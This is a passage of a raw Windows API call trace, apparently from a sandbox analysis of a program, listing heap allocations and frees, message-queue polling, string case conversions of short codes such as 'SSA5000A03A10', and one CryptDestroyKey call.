wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0265.511] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0265.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0265.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0265.511] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0265.511] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0265.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0265.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0265.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0265.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0265.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0265.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0265.511] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0265.511] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0265.511] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0265.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0265.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0265.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0265.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0265.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0265.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0265.512] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0265.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0265.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0265.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0265.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0265.512] CryptDestroyKey (hKey=0xaa5860) returned 1 [0265.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0265.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0265.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0265.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0265.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0265.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0265.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0265.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0265.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0265.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0265.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0265.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0265.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0265.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0265.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0265.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0265.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0265.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0265.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0265.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0265.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0265.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0265.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0265.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0265.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0265.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0265.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0265.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0265.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0265.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0265.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0265.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0265.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0265.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0265.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0265.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0265.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0265.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0265.515] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0265.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0265.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0265.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0265.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0265.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0265.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0265.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0265.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0265.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0265.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0265.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0265.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0265.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0265.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0265.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0265.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0265.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0265.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0265.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0265.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0265.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0265.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0265.516] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0265.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0265.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0265.516] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0265.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0265.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0265.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c48 [0265.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0265.516] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0265.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0265.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0265.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0265.517] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0265.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0265.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0265.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0265.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0265.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0265.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0265.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0265.517] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0265.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0265.517] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0265.517] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0265.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0265.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0265.517] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0265.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0265.518] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0265.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0265.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0265.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0265.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0265.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0265.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0265.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0265.518] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0265.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0265.518] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0265.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0265.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0265.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0265.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0265.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0265.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0265.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0265.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0265.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0265.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0265.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0265.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0265.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0265.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0265.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0265.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0265.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0265.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0265.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0265.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0265.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0265.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0265.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0265.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0265.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0265.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0265.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0265.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0265.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0265.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0265.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0265.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0265.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0265.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0265.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0265.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0265.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0265.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0265.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0265.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0265.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0265.520] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0265.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0265.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0265.521] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0265.521] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0265.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0265.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0265.521] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0265.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0265.521] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0265.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0265.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0265.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0265.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0265.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0265.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0265.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0265.521] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0265.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0265.521] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0265.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0265.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0265.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0265.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0265.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0265.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0265.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0265.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0265.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0265.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0265.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0265.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0265.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0265.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0265.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0265.522] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0265.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0265.522] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0265.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0265.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0265.523] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0265.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0265.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0265.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0265.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0265.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0265.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0265.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0265.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0265.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0265.523] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, 